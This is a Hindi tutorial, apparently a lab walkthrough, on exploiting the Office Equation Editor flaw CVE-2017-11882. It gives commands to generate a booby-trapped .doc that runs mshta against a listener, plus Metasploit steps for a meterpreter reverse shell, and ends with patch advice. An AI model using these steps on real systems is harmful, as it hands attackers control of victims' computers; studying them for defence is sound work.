
CVE-2017-11882(Office 2003 से 2016 तक के सभी संस्करणों का सार्वभौमिक शोषण)
शोषण प्रभाव के दृष्टिकोण से, यह Office 2003 से 2016 के सभी संस्करणों को प्रभावित कर सकता है, और संपूर्ण आक्रमण वातावरण का निर्माण बहुत सरल है। यह भेद्यता Office सॉफ्टवेयर के [सूत्र संपादक] के कारण होती है, क्योंकि संपादक प्रक्रिया नाम की लंबाई की जाँच नहीं करती है, जिससे बफर ओवरफ्लो होता है। हमलावर विशेष वर्णों का निर्माण करके मनमाना कोड निष्पादित कर सकता है। उदाहरण के लिए, यदि कोई हैकर इस भेद्यता का उपयोग करके शेल बैकडोर युक्त Office फ़ाइल बनाता है, और एक सामान्य उपयोगकर्ता उस Office फ़ाइल को खोलता है, तो कंप्यूटर हैकर के सीधे नियंत्रण में आ सकता है।
office 2003
office 2007
office 2010
office 2013
office 2016
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

जनरेट की गई "test.doc" पर क्लिक करने पर कैलकुलेटर सफलतापूर्वक खुलता है।
python Command_CVE-2017-11882.py -c "mshta http://192.168.43.165:8080/11882" -o 11882-3.doc


11882-3.doc Word फ़ाइल सफलतापूर्वक बनाई।
cve_2017_11882.rb फ़ाइल को /usr/share/metasploit-framework/modules/exploits/windows/smb निर्देशिका में रखें:
msf > search CVE-2017-11882
msf > use exploit/windows/smb/CVE-2017-11882
msf exploit(CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp
msf exploit(CVE-2017-11882) > set lhost 192.168.43.165
msf exploit(CVE-2017-11882) > set uripath 11882
msf exploit(CVE-2017-11882) > exploit
लिसनिंग प्रारंभ करें:

विन 7 लक्ष्य मशीन में 11882-3.doc फ़ाइल पर क्लिक करें, सत्र प्राप्त करने में सफल!

① ऑनलाइन अपडेट; विंडोज अपडेट चालू करें, यह विधि अधिकांश लोगों के लिए पर्याप्त है।
② पैच लगाएं; इस भेद्यता के लिए माइक्रोसॉफ्ट पैच पता: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882